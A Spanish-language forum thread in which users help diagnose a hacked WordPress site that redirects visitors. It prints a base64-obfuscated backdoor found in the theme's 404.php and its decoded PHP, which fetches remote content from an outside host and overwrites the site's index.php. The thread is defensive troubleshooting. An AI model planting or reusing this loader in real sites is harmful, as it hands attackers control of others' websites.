Mi Wordpress Hackeado

[ka0s]

El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien.

Código [Seleccionar] Expandir

http://www.wilboradalibros.com.ar/readme.html

Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido.

PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer.


Edit:

Código [Seleccionar] Expandir

http://www.wilboradalibros.com.ar/wp-login.php

Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php

Saludos

#!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío.
Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo?

Nuevamente muchas gracias!!

EDIT:

La línea 154, tiene esto:

Código (php) [Seleccionar] Expandir

* Do not allow accidental or negligent de-registering of critical scripts in the admin.
* Show minimal remorse if the correct hook is used.
*/
$current_filter = current_filter();
if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
( 'wp-login.php' === $GLOBALS['pagenow'] && 'login_enqueue_scripts' !== $current_filter )
) {
$no = array(
'jquery', 'jquery-core', 'jquery-migrate', 'jquery-ui-core', 'jquery-ui-accordion',
'jquery-ui-autocomplete', 'jquery-ui-button', 'jquery-ui-datepicker', 'jquery-ui-dialog',
'jquery-ui-draggable', 'jquery-ui-droppable', 'jquery-ui-menu', 'jquery-ui-mouse',
'jquery-ui-position', 'jquery-ui-progressbar', 'jquery-ui-resizable', 'jquery-ui-selectable',
'jquery-ui-slider', 'jquery-ui-sortable', 'jquery-ui-spinner', 'jquery-ui-tabs',
'jquery-ui-tooltip', 'jquery-ui-widget', 'underscore', 'backbone',
);

if ( in_array( $handle, $no ) ) {
$message = sprintf( __( 'Do not deregister the %1$s script in the administration area. To target the frontend theme, use the %2$s hook.' ),
"<code>$handle</code>", '<code>wp_enqueue_scripts</code>' );
_doing_it_wrong( __FUNCTION__, $message, '3.6' );
return;
}
}

$wp_scripts->remove( $handle );
}

/**

[MinusFour]

Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:

Código [Seleccionar] Expandir


http://wilboradaslibros.com.ar/wp-admin/

Por cierto estos errores le salian a la dueña antes?

Código [Seleccionar] Expandir

Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900

Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

[ka0s]

Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:

Código [Seleccionar] Expandir


http://wilboradaslibros.com.ar/wp-admin/

Por cierto estos errores le salian a la dueña antes?

Código [Seleccionar] Expandir

Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900

Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores.
Que complicado se está volviendo esto .
PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy

[MinusFour]

¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

[ka0s]

¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes)

Código (php) [Seleccionar] Expandir

function wp_clear_auth_cookie() {
/**
* Fires just before the authentication cookies are cleared.
*
* @since 2.7.0
*/
do_action( 'clear_auth_cookie' );

setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,          COOKIE_DOMAIN );
setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH,      COOKIE_DOMAIN );

// Old cookies
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );

// Even older cookies
setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
}
endif;

A partir del primer setcookie sería 883 la línea.

[ka0s]

He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de  wp-content/themes



Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto:

Código (php) [Seleccionar] Expandir

ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1ORmFGVmliSEJvVldwR1lXSldjRVpoUnpsT1VsZDRSbFJWWkd0VE1ERjBXak5rWVZKWGFFTlViWFEwVGxVNVdWUnNjRmRsYTFvelYxUkpkMDVYVWxkaVJsSlBWakpvY0ZWcVJtRk9WbEpJVFVSV2JGWnVRVEZVTVdoRFlWZEtWMU51VG1GV1ZUQjRWRlZrVjFOV1ZsaE9Wa0pyVFdwc2VWZFVRbXRTTURGSVVtdFNVbFpIZUV0VmFrcFRZekZ3UmxwR1pHdFdNVXAzVjJwS2MxVXhTbFZpUlZaWFlrWldORlZ0ZUZOak1WWjBWMnhhYUdWdGVGSldiWFJQVTIxT1JtVklRbHBOYWxaUldrUkpOVlJHYkZkYVJuQnBUV3RhV2xaSE1XRlpWa2w1WlVSV1ZFMUZOVlJhUkVaelYxWldkRTlWTVdoV01EUjVWMnRTVDFGdFVrZGhNMnhRVjBaYWNsVnFSbUZOVm5CR1ZHMXdhbEpYZUVkVmJYTTFWVEZGZDFOdVpGcGxhMVV4V1ZSS1IxZFdUbGhQVlhSVVVsVndkbGRyVm10aWJWSldZMFJXVUZaRk5YRlZXSEJIWWpGa2Nsa3phR3BTTUhCM1YxUk9RMU5zU2xaWGJFSldZVEExUTFkcVNrZFhWbEowVjIxR1UwMXVaekZWZWtKUFZUSlJlR0pHYkZaaVZHeE9XVlprVDAxc2NFVlVhMHByVWpCYVdWUnNaSGRo.Vms1SFYyNUtXR0pIYUU5WmJYUXdWa2RLUlZwRlVtaFdhM0I0VjFkd1MxVXlTa2RSYkZKU1lsUkdiMVpxVG05ak1XUkZVMjEwYVZJeFNraFVNV1IzWVZVeGNWWllaRmhpUjAxNFZGVmtUMDVXYjNsa1JuQk9ZVzE0ZVZZeWVGcE9WVEZJVm10c1ZsZEZTbEZhUkVrMVkyeHNWMWw2Um1oTldFSmFXVlZrWVdGc1NYZFhXR1JhVmxVMVExUXhWbk5TUmxaMVdrWndXRkpyY0RKV1JXUnpZVzFTZEZKc2FFOVdNMUpvVmpCa2EwMVdhM2RhUnpsci5UVWhCTWxsNlFqQlRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSV2hwVW5wR1RWVnFSbmRrTVd4eVdrWmtZV0pWTlVwV2JYQkRWMVV4Y2s1VVNscGlWRlpVV1d0a1MyUldWblZqUlhoU1RWVndNMWRYTUhoVk1rcElWbXRrVUZkSFVtRldNRnBMWkd4U1JsUnJTbWhOVjNRMVZERmtNRmxXVlhsa1NHUmhWMGRTTWxkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1pITmFSVGxwVFd0dk1WVldZekZWVmtsNFkwUktXbUpVVmxOWGFrWnlaVlU1V1ZSdGJFNU5SM014VlRGak1WTXlTa2RqUlZKVVZYcFdjUzVaVldoS1lqQTFSVlJZUWsxaGVsWkdWVlpTVjFOc1NsZFhhbFphVFdwQk1WcFdXa05TUlRsWVRWZHNUbUZzVmpOV1ZXUnpZV3MwZVZkc2FGZGlhelZ4VkZkNFdrMHhSWGxpUlVwaFR.VZDRSVlZXWkd0VGJFVjNVbTAxVkZaVk5VTlhha0p6VWtaR1dGcEZjRkpOUlhCNlZqRlNTMkl5VW5KaVJWSmFaVzFvYUZsc1VuTk5WbkJHVkd0T2FHSlZiRFZhVldoaFlXMUdjVkZ1UWxwTmFrWllXVlJDYzJOVk5WWlhiWEJwWVROQmVWZFVTbmROTWxKelkwaFNVRmRHV25KVmExSlRaRlpSZWxwSVdtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlhiWGhIWkd4dmVWZHNhRmRpYXpWeFZGZDRXazB4UlhsTlZtUm9ZbFZhU1ZRd1pHdFRNREZ6VjJwV1drMXFRVEZhVmxaM1RtMU5kMlJITVZaV2VteE5VekZPY2s1NWEzQlBkeWtwT3cpKTs

BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!!

[MinusFour]

Eso es base 64 y se traduce a:

Código (php) [Seleccionar] Expandir

$code_txt = 'http://lamirona.aler.org/index.txt';
$path = getenv("DOCUMENT_ROOT").'';

if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND  is_dir($path.'/wp-includes')){
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
                if(file_put_contents($index_path, $code)){
                echo '<font color="red"7409 Error</font>';}else{
                echo '<font color="red">Error</font>';
                }
}else{
echo 'error';
}

Seguro que no había nada raro en el index.php?

[#!drvy]

En realidad ese script ha hecho su trabajo xD

Código [Seleccionar] Expandir

http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

[EFEX]

Yo miraria en wp-includes que archivos fueron los ultimos en ser modificados.

[ka0s]

En realidad ese script ha hecho su trabajo xD

Código [Seleccionar] Expandir

http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

Este es el reporte precisamente:



Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca...